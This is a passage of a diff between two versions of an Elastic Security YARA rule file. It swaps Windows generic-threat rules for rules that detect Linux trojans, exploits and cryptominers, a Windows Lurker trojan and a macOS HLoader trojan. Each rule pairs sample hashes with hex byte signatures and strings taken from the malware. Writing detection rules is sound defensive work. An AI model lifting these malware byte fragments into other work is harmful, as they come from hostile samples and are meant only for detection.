24 F8 01 00 00 44 0F 11 BC 24 88 01 00 00 44 0F 11 BC 24 90 01 00 00 44 0F 11 BC 24 } + $a = { 47 53 45 54 2C 20 70 69 64 2C 20 4E 54 5F 50 52 53 54 41 54 } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_61315534 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Generic_5E981634 : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Linux Trojan Generic (Linux.Trojan.Generic)" author = "Elastic Security" - id = "61315534-9d80-428b-bc56-ff4836ab0c4a" - date = "2024-01-11" - modified = "2024-02-08" + id = "5e981634-e34e-4943-bf8f-86cfd9fffc85" + date = "2022-01-05" + modified = "2022-01-26" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L974-L992" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "819447ca71080f083b1061ed6e333bd9ef816abd5b0dd0b5e6a58511ab1ce8b9" - logic_hash = "0fdfe3bb6ebdaac4324a45dac8680f00684d0030419f26f3f72ed002bf5a2a34" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Generic.yar#L221-L239" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "448e8d71e335cabf5c4e9e8d2d31e6b52f620dbf408d8cc9a6232a81c051441b" + logic_hash = "4623c07a15588788ec8a484642a33f2d18127849302d57520a0dac875564f62c" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "e5cff64bc04b271237015154ddeb275453536ffa8cbce60389b6ed37e6478788" - severity = 50 + fingerprint = "57f1e8fa41f6577f41a73e3460ef0c6c5b0a65567ae0962b080dfc8ab18364f5" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 55 8B EC 51 51 8A 4D 08 F6 C1 01 74 0A DB 2D B0 D7 41 00 DB 5D 08 9B F6 C1 08 74 10 9B DF E0 DB 2D B0 D7 41 00 DD 5D F8 9B 9B DF E0 F6 C1 10 74 0A DB 2D BC D7 41 00 DD 5D F8 9B F6 C1 04 74 09 } + $a = { 74 1D 8B 44 24 68 89 84 24 A4 00 00 00 8B 44 24 6C 89 84 24 A8 00 } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_Eab96Cf2 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Generic_D8953Ca0 : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Linux Trojan Generic (Linux.Trojan.Generic)" author = "Elastic Security" - id = "eab96cf2-f25a-4149-9328-3f7af50b2ad8" - date = "2024-01-11" - modified = "2024-02-08" + id = "d8953ca0-f1f1-4d76-8c80-06f16998ba03" + date = "2022-01-05" + modified = "2022-01-26" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L994-L1012" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "2be8a2c524f1fb2acb2af92bc56eb9377c4e16923a06f5ac2373811041ea7982" - logic_hash = "cc1dfc2c9c5e1fbc6282342dfbf3a6c834fa56fb6fc46569a24fa78535c5845f" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Generic.yar#L241-L259" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "552753661c3cc7b3a4326721789808482a4591cb662bc813ee50d95f101a3501" + logic_hash = "cbc1a60a1d9525f7230336dff07f56e6a0b99e7c70c99d3f4363c06ed0071716" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "a07bbc803aa7ae54d0c0b2b15edf8378646f06906151998ac3d5491245813dd9" - severity = 50 + fingerprint = "16ab55f99be8ed2a47618978a335a8c68369563c0a4d0a7ff716b5d4c9e0785c" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 20 41 52 FF E0 58 41 59 5A 48 8B 12 E9 4B FF FF FF 5D 48 31 DB 53 49 BE 77 69 6E 68 74 74 70 00 41 56 48 89 E1 49 C7 C2 4C 77 26 07 FF D5 53 53 48 89 E1 53 5A 4D 31 C0 4D 31 C9 53 53 } + $a = { 5B 9C 9C 9C 9C 5C 5D 5E 5F 9C 9C 9C 9C B1 B2 B3 B4 9C 9C 9C 9C } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_11A56097 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Generic_181054Af : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Linux Trojan Generic (Linux.Trojan.Generic)" author = "Elastic Security" - id = "11a56097-c019-43dc-b401-c3bd5e88ce17" - date = "2024-01-12" - modified = "2024-02-08" + id = "181054af-dc05-4981-8a57-ea17ffd6241f" + date = "2022-01-05" + modified = "2022-01-26" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L1014-L1033" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "98d538c8f074d831b7a91e549e78f6549db5d2c53a10dbe82209d15d1c2e9b56" - logic_hash = "42f955c079752c787ac70682bc41fa31f3196d30051d7032276a0d4279d59d58" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Generic.yar#L261-L279" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "e677f1eed0dbb4c680549e0bf86d92b0a28a85c6d571417baaba0d0719da5f93" + logic_hash = "e92807b603dd33fe7a083985644a213913a77e81c068623fdac7931148207b91" score = 75 - quality = 71 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "37fda03cc0d50dc8bf6adfb83369649047e73fe33929f6579bf806b343eb092c" - severity = 50 + fingerprint = "8ef033ac0fccd10cdf2e66446461b7c8b29574e5869440a1972dbe4bb5fbed89" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 6E 6F 69 74 70 65 63 78 45 74 61 6D 72 6F 46 65 67 61 6D 49 64 61 42 } - $a2 = { 65 74 75 62 69 72 74 74 41 65 74 65 6C 6F 73 62 4F } + $a = { 6D 6F 64 00 73 65 74 75 74 78 65 6E 74 00 67 6D 74 69 6D 65 00 } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_F3Bef434 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Generic_C3D529A2 : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Linux Trojan Generic (Linux.Trojan.Generic)" author = "Elastic Security" - id = "f3bef434-0688-4672-a02f-40615cc429b1" - date = "2024-01-12" - modified = "2024-02-08" + id = "c3d529a2-f2c7-41de-ba2a-2cbf2eb4222c" + date = "2022-09-12" + modified = "2022-10-18" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L1035-L1053" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "98d538c8f074d831b7a91e549e78f6549db5d2c53a10dbe82209d15d1c2e9b56" - logic_hash = "efba0e1fbe6562a9aeaac23b851c31350e4ac6551e505be4986bddade92ca303" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Generic.yar#L281-L299" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "b46135ae52db6399b680e5c53f891d101228de5cd6c06b6ae115e4a763a5fb22" + logic_hash = "a508acd95844a4385943166f715606199048d96be0098bc89f9be7b9db34833e" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "a05dfdf2f8f15335acb2772074ad42f306a4b33ab6a19bdac99a0215820a6f7b" - severity = 50 + fingerprint = "72ef5b28489e01c3f2413b9a907cda544fc3f60e00451382e239b55ec982f187" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 6F 70 00 06 EB 72 06 26 0A 00 01 45 6F 04 00 00 8F 7B 02 06 26 0A 00 01 44 6F 70 00 06 D5 72 00 00 00 B8 38 1D 2C EB 2C 1A 00 00 00 B8 38 14 04 00 00 8F 7B 00 00 00 BD 38 32 2C 00 00 00 BE 38 } + $a = { 1C 31 C0 5B 5E 5F 5D C3 8B 1C 24 C3 8D 64 24 04 53 8B DA 5B } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_C6F131C5 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Generic_4675Dffa : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Linux Trojan Generic (Linux.Trojan.Generic)" author = "Elastic Security" - id = "c6f131c5-8737-4f48-a0fe-a94e9565481e" - date = "2024-01-12" - modified = "2024-02-08" + id = "4675dffa-0536-4a4d-bedb-f8c7fa076168" + date = "2023-07-28" + modified = "2024-02-13" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L1055-L1073" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "247314baaaa993b8db9de7ef0e2998030f13b99d6fd0e17ffd59e31a8d17747a" - logic_hash = "5702a77fee0cd564916abdbfedf76d069bb7a5b6de0c4623150991d52dc02e42" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Generic.yar#L301-L320" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "43e14c9713b1ca1f3a7f4bcb57dd3959d3a964be5121eb5aba312de41e2fb7a6" + logic_hash = "d2865a869d0cf0bf784106fe6242a4c7f58e58a43c4d4ae0241b10569810904d" score = 75 - quality = 75 + quality = 73 tags = "FILE, MEMORY" - fingerprint = "c4349bd78cdc64430d15caf7efd663ff88d79d69ecf9f8118122b9a85543057d" - severity = 50 + fingerprint = "7aa556e481694679ce0065bcaaa4d35e2c2382326681f03202b68b1634db08ab" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 20 48 8B 59 08 8B 13 44 8B 43 04 48 83 C3 08 89 D0 44 09 C0 74 07 E8 B6 FF FF FF EB E8 48 83 C4 20 5B C3 53 45 31 DB BB 0D 00 00 00 48 8B 41 10 45 89 DA 49 C1 E2 04 4A 83 3C 10 00 74 } + $a1 = ", i = , not , val ./zzzz.local.onion" + $a2 = { 61 74 20 20 25 76 3D 25 76 2C 20 28 63 6F 6E 6E 29 20 28 73 63 61 6E 20 20 28 73 63 } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_B2A054F8 : FILE MEMORY +rule ELASTIC_Linux_Exploit_Alie_E69De1Ee : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Linux Exploit Alie (Linux.Exploit.Alie)" author = "Elastic Security" - id = "b2a054f8-160f-4932-b5fe-c7d78a1f9b74" - date = "2024-01-12" - modified = "2024-02-08" + id = "e69de1ee-294d-437e-a943-abb731842523" + date = "2021-04-06" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L1075-L1095" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "63d2478a5db820731a48a7ad5a20d7a4deca35c6b865a17de86248bef7a64da7" - logic_hash = "f64b1666f78646322a4c37dc887d8fcfdb275b0bca812e360579cefd9e323c02" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Exploit_Alie.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "882839549f062ab4cbe6df91336ed320eaf6c2300fc2ed64d1877426a0da567d" + logic_hash = "bb4625751c924b9ff5d32cc044fcff68892e82d9e94d679c4e4c8286f680a854" score = 75 - quality = 69 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "09f1724963bfdde810b61d80049def388c89f6a21195e90a869bb22d19d074de" - severity = 50 + fingerprint = "01fa5343fa0fb60c320f9fa49beb9c7a8a821ace7f1d6e48ea103e746b3f27a2" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 7E 38 7E 40 7E 44 48 4C 2A 7E 7E 58 5D 5C } - $a2 = { 39 7B 34 74 26 39 3A 62 3A 66 25 6A } - $a3 = { 5B 50 44 7E 66 7E 71 7E 77 7E 7C 7E } + $a = { 0C 8D 4B 08 8D 53 0C B0 0B CD 80 89 C3 31 C0 B0 } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_Fcab7E76 : FILE MEMORY +rule ELASTIC_Linux_Cryptominer_Pgminer_Ccf88A37 : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Linux Cryptominer Pgminer (Linux.Cryptominer.Pgminer)" author = "Elastic Security" - id = "fcab7e76-5edd-4485-9983-bcc5e9cb0a08" - date = "2024-01-12" - modified = "2024-02-08" + id = "ccf88a37-2a58-40f9-8c13-f1ce218a2ec4" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L1097-L1115" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "67d7e016e401bd5d435eecaa9e8ead341aed2f373a1179069f53b64bda3f1f56" - logic_hash = "90f50d1227b8e462eaa393690dc2b25601444bf80f2108445a0413bff6bedae8" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Cryptominer_Pgminer.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "3afc8d2d85aca61108d21f82355ad813eba7a189e81dde263d318988c5ea50bd" + logic_hash = "77833cdb319bc8e22db2503478677d5992774105f659fe7520177a691c83aa91" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "8a01a3a398cfaa00c1b194b2abc5a0c79d21010abf27dffe5eb8fdc602db7ad1" - severity = 50 + fingerprint = "dc82b841a7e72687921c9b14bc86218c3377f939166d11a7cccd885dad4a06e7" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 28 FA 00 2B CD 65 50 7C FF CF 34 00 80 41 BF 1E 12 1A F9 20 0F 56 EE 9F BA C0 22 7E 97 FC CB 03 C7 67 9A AE 8A 60 C0 B3 6C 0D 00 2B 2C 78 83 B5 88 03 17 3A 51 4A 1F 30 D2 C0 53 DC 09 7A BF 2D } + $a = { F6 41 83 C5 02 48 8B 5D 00 8A 0B 80 F9 2F 76 7E 41 83 FF 0A B8 0A 00 } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_90E4F085 : FILE MEMORY +rule ELASTIC_Linux_Cryptominer_Pgminer_5Fb2Efd5 : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Linux Cryptominer Pgminer (Linux.Cryptominer.Pgminer)" author = "Elastic Security" - id = "90e4f085-2f53-4e5e-bcb6-c24823539241" - date = "2024-01-12" - modified = "2024-02-08" + id = "5fb2efd5-4adc-4285-bef1-6e4987066944" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L1117-L1137" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "1a6a290d98f5957d00756fc55187c78030de7031544a981fd2bb4cfeae732168" - logic_hash = "2afeae6de965ae155914dcedbfe375327a9fca3b42733c23360dd4fddfcc8a3d" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Cryptominer_Pgminer.yar#L21-L39" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "6d296648fdbc693e604f6375eaf7e28b87a73b8405dc8cd3147663b5e8b96ff0" + logic_hash = "4c247f40c9781332f04f82a244f6e8e22c9c744963f736937eddecf769b40a54" score = 75 - quality = 69 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "1d40eef44166b3cc89b1f2ba9c667032fa44cba271db8b82cc2fed738225712a" - severity = 50 + fingerprint = "8ac56b60418e3f3f4d1f52c7a58d0b7c1f374611d45e560452c75a01c092a59b" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 39 39 21 3A 37 3B 45 3C 50 3D 5B 3E 66 3F } - $a2 = { 66 32 33 39 20 3A 4E 3D 72 68 74 76 48 } - $a3 = { 32 78 37 7A 42 5A 4C 22 2A 66 49 7A 75 } + $a = { 00 16 00 00 00 0E 00 00 00 18 03 00 7F EB 28 33 C5 56 5D F2 50 67 C5 6F } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_04A9C177 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Lurker_0Ee51802 : FILE { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Windows Trojan Lurker (Windows.Trojan.Lurker)" author = "Elastic Security" - id = "04a9c177-cacf-4509-b8dc-f30a628b7699" - date = "2024-01-12" - modified = "2024-02-08" + id = "0ee51802-4ff3-4edf-95ed-bb0338ff25d9" + date = "2022-04-04" + modified = "2022-06-09" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L1139-L1157" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "0cccdde4dcc8916fb6399c181722eb0da2775d86146ce3cb3fc7f8cf6cd67c29" - logic_hash = "ca7cf71228b1e13ec05c62cd9924ea5089fdf903d8ea4a5151866996ea81e01e" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Lurker.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "5718fd4f807e29e48a8b6a6f4484426ba96c61ec8630dc78677686e0c9ba2b87" + logic_hash = "782926c927dce82b95e51634d5607c474937e1edc0f7f739acefa0f4c03aa753" score = 75 quality = 75 - tags = "FILE, MEMORY" - fingerprint = "b36da73631711de0213658d30d3079f45449c303d8eb87b8342d1bd20120c7bb" + tags = "FILE" + fingerprint = "c30bc4e25c1984268a3bb44c59081131d1e81254b94734f6af2b47969c0acd0e" severity = 50 arch_context = "x86" - scan_context = "file, memory" + scan_context = "file" license = "Elastic License v2" os = "windows" strings: - $a1 = { 6F 81 00 06 FE 3C A3 C3 D6 37 16 00 C2 87 21 EA 80 33 09 E5 00 2C 0F 24 BD 70 BC CB FB 00 94 5E 1B F8 14 F6 E6 95 07 01 CD 02 B0 D7 30 25 65 99 74 01 D6 A4 47 B3 20 AF 27 D8 11 7F 03 57 F6 37 } + $str1 = "\\Device\\ZHWLurker0410" wide fullword condition: - all of them + int16 ( uint32(0x3C)+0x5c)==0x0001 and $str1 } -rule ELASTIC_Windows_Generic_Threat_45D1E986 : FILE MEMORY +rule ELASTIC_Macos_Trojan_Hloader_A3945Baf : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Macos Trojan Hloader (MacOS.Trojan.HLoader)" author = "Elastic Security" - id = "45d1e986-78fb-4a83-97f6-2b40c657e709" - date = "2024-01-12" - modified = "2024-02-08" + id = "a3945baf-4708-4a0b-8a9b-1a5448ee4bc7" + date = "2023-10-23" + modified = "2023-10-23" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L1159-L1177" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "fd159cf2f9bd48b0f6f5958eef8af8feede2bcbbea035a7e56ce1ff72d3f47eb" - logic_hash = "d53a4d189b9a49f9b6477e12bce0d41e62827306d1df79e6494ab67669d84f35" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/MacOS_Trojan_HLoader.yar#L1-L21" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "2360a69e5fd7217e977123c81d3dbb60bf4763a9dae6949bc1900234f7762df1" + logic_hash = "0383485b6bbcdae210a6c949f6796023b2f7ec3f1edbd2116207fc2b75a67849" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "facb67b78cc4d6cf5d141fd7153d331209e5ce46f29c0078c7e5683165c37057" - severity = 50 + fingerprint = "a48ec79f07a6a53611b1d1e8fe938513ec0ea19344126e07331b48b028cb877e" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "macos" strings: - $a1 = { 28 45 00 06 00 00 00 08 28 45 00 09 00 00 00 14 28 45 00 09 00 00 00 20 28 45 00 07 00 00 00 28 28 45 00 0A 00 00 00 34 28 45 00 0B 00 00 00 40 28 45 00 09 00 00 00 5B 81 45 00 00 00 00 00 4C } + $seq_main = { 74 ?? 49 89 C7 48 89 D8 4C 89 FF E8 ?? ?? ?? ?? 48 89 DF 31 F6 BA ?? ?? ?? ?? 4C 89 65 ?? 4D 89 F4 4C 89 F1 4C 8B 75 ?? 41 FF 56 ?? } + $seq_exec = { 48 B8 00 00 00 00 00 00 00 E0 48 89 45 ?? 4C 8D 6D ?? BF 11 00 00 00 E8 ?? ?? ?? ?? 0F 10 45 ?? 0F 11 45 ?? 48 BF 65 78 65 63 46 69 6C 65 48 BE 20 65 72 72 6F 72 20 EF } + $seq_rename = { 41 89 DE 84 DB 74 ?? 48 8B 7D ?? FF 15 ?? ?? ?? ?? E9 ?? ?? ?? ?? 4C 89 E7 E8 ?? ?? ?? ?? } condition: - all of them + 2 of ($seq*) } -rule ELASTIC_Windows_Generic_Threat_83C38E63 : FILE MEMORY +rule ELASTIC_Linux_Exploit_Ramen_01B205Eb : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Linux Exploit Ramen (Linux.Exploit.Ramen)" author = "Elastic Security" - id = "83c38e63-6a18-4def-abf2-35e36210e4cf" - date = "2024-01-12" - modified = "2024-02-08" + id = "01b205eb-4718-4ffd-9fdc-b9de567c4603" + date = "2021-04-06" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L1179-L1198" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "2121a0e5debcfeedf200d7473030062bc9f5fbd5edfdcd464dfedde272ff1ae7" - logic_hash = "89d4036290a29b372918205bba85698d6343109503766cbb13999b5177fc3152" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Exploit_Ramen.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "c0b6303300f38013840abe17abe192db6a99ace78c83bc7ef705f5c568bc98fd" + logic_hash = "e477e93434db9e650f159995f2cb754394f3187dc341d2ea4c2466924e19a8a6" score = 75 - quality = 71 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "9cc8ee8dfa6080a18575a494e0b424154caecedcc8c8fd07dd3c91956c146d1e" - severity = 50 + fingerprint = "a39afcf7cec82dc511fd39b4a019ef161250afe7cb0880e488badb56d021cc9f" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 32 65 65 64 36 35 36 64 64 35 38 65 39 35 30 35 62 34 33 39 35 34 32 30 31 39 36 66 62 33 35 36 } - $a2 = { 34 2A 34 4A 34 52 34 60 34 6F 34 7C 34 } + $a = { 00 31 C0 31 DB 31 C9 B0 46 CD 80 31 C0 31 DB 43 } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_Bd24Be68 : FILE MEMORY +rule ELASTIC_Linux_Exploit_Race_758A0884 : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Linux Exploit Race (Linux.Exploit.Race)" author = "Elastic Security" - id = "bd24be68-3d72-44fd-92f2-39f592d47d0e" - date = "2024-01-12" - modified = "2024-02-08" + id = "758a0884-0174-46c8-a57a-980fc04360d0" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L1200-L1218" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "fd159cf2f9bd48b0f6f5958eef8af8feede2bcbbea035a7e56ce1ff72d3f47eb" - logic_hash = "8536593696930d03f1e62586886f0df5438d13fb796b4605df7ad67d9633d5f9" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Exploit_Race.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "a4966baaa34b05cb782071ef114a53cac164e6dece275c862fe96a2cff4a6f06" + logic_hash = "ccba0e2ddefd53939cda6b4985def2d487ac5916cbad7374ac3143f02b9f7ff5" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "35ff6c9b338ef95585d8d0059966857f6e5a426fa5f357acb844d264d239c70d" - severity = 50 + fingerprint = "3516086ae773ec1c1de75a54bafbb72ad49b4c7f1661961d5613462b53f26c43" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 55 8B EC 8B 4D 0C 56 8B 75 08 89 0E E8 AB 17 00 00 8B 48 24 89 4E 04 E8 A0 17 00 00 89 70 24 8B C6 5E 5D C3 55 8B EC 56 E8 8F 17 00 00 8B 75 08 3B 70 24 75 0E 8B 76 04 E8 7F 17 00 00 89 70 24 } + $a = { 00 22 00 00 00 36 00 00 00 18 85 04 08 34 00 00 00 12 00 00 } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_A0C7B402 : FILE MEMORY +rule ELASTIC_Windows_Virus_Floxif_493D1897 : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Windows Virus Floxif (Windows.Virus.Floxif)" author = "Elastic Security" - id = "a0c7b402-cee5-4da6-9a32-72b1a0ae0f8d" - date = "2024-01-16" - modified = "2024-02-08" + id = "493d1897-864e-4f18-8511-0c6c9d990990" + date = "2023-09-26" + modified = "2023-11-02" reference = "https://github.com/elastic/protections-artifacts/" - source_url = 